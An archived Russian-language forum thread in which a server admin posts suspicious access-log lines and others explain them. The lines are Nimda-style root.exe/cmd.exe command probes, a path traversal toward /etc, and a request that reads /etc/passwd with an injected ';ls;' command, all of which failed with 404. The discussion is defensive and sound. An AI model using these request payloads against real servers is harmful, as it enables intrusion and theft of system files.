Архив форумов ЦИТФорума

[Gupalov]

Есть обычный лог типа:
IP - [13/Apr/2002:11:43:11 +0600] "GET /banner.htm HTTP/1.1" 200 869

Есть записи которые у меня вызывают подозрения:
"GET /default.ida?NNN%u00=a HTTP/1.0" 404 280

"GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 267

"GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 277

"GET /scripts/root.exe?/c+dir HTTP/1.0" 404 269

"GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 277

"GET ///index.php?chemin=..%2F..%2F..%2F..%2F..%2F..%2Fetc HTTP/1.0" 404 279

И особое моё внимание привлекла строчка:
"GET ///edit_image.php? dn=1&userfile= /etc/passwd&userfile_name=%20;ls;%20 HTTP/1.0" 404 284

[and3008]

Да, были попытки поиметь твою систему используя ошибки в скриптах.
Кулхацкер получил от твоего сервака любимую 404 ошибку.

Спи спокойно.

Если не спится, то погляди на IP, вычисли провайдера и накапай.

[Gupalov]

Спасибо за ответ.

[Kest]

*

[Lesnick]

>>"GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 267
>>"GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 277
>>"GET /scripts/root.exe?/c+dir HTTP/1.0" 404 269
>>"GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 277
>>"GET ///index.php?chemin=..%2F..%2F..%2F..%2F..%2F..%2Fetc HTTP/1.0" 404 279

Нууу, подобный код выдает вирус Nimda.E

>>И особое моё внимание привлекла строчка:
>>"GET ///edit_image.php? dn=1&userfile= /etc/passwd&userfile_name=%20;ls;%20 HTTP/1.0" 404 284

А это уже интересно

[Gupalov]

Lesnick, а этот вирус я надеюсь не на моём серваке висит?